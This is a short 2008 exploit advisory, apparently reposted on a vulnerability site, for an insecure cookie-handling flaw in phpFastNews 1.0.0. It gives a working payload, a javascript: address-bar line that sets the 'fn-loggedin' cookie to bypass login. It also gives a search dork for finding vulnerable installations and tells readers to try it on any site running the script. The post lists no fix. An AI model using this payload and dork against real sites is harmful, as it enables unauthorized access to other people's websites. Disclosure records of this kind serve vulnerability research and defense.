phpFastNews 1.0.0 Insecure Cookie Handling Vulnerability

2008-10-18 20:01:06

phpFastNews
1.0.0 Insecure Cookie Handling Vulnerability#################################################
## Qabandi iqa[at]hotmail.fr ##
## from Kuwait ##
#################################################
\\ phpFastNews
// Insecure cookie handling
\\
// Go to any website that has the script installed
\\ type the following code into the Adress Bar
//
\\ javascript:document.cookie = "fn-loggedin = 1";
//
\\ Refresh do whatever, and you will be logged in
//
\\ Dork:intext:"Powered by phpFastNews"
#################################################
## Greetz: Killer Hack, Str0ke ##
#################################################
PEACE

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.